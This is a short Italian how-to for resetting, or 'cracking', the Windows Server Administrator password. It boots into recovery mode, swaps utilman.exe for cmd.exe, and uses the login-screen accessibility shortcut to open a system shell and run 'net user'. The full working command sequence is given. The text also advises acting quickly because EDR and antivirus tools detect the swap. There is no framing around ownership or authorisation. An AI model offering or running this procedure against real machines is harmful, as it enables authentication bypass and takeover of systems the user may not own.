Craccare la password di Administrator di Windows Server

E' un trucco noto anche agli EDR e antivirus, una volta scambiato il file bisogna agire velocemente.

• Fare il boot da CD (anche con una versione successiva di Windows, ma non precedente perché potrebbe non leggere il file system)
• Dopo la selezione della lingua anziché selezionare Install Now, cliccare su Repair your computer in basso
• Selezionare Troubleshoot e Command Prompt
• Sostituire utilman, vedi sotto, e riavviare
• Alla schermata di login premere Win+U oppure cliccare sull'icona nell'angolo con il cerchio e la freccia
• Quando appare il prompt dare questo comando per resettare la password di Administrator:
  net user Administrator NuovaPass1
• Per rimettere le cose a posto (se non lo fa l'Antivirus/EDR) ripetere l'operazione di sostituzione di utilman e rimettere a posto il file bak

Eseguire questi comandi, se il comando net ritorna un errore, l'utente Administrator potrebbe essere stato rinominato. Per avere l'elenco degli utenti locali dare il comando net user

c:
cd \Windows\System32
move utilman.exe utilman.exe.bak
copy cmd.exe utilman.exe
net user administrator /active:yes
shutdown -r -t 0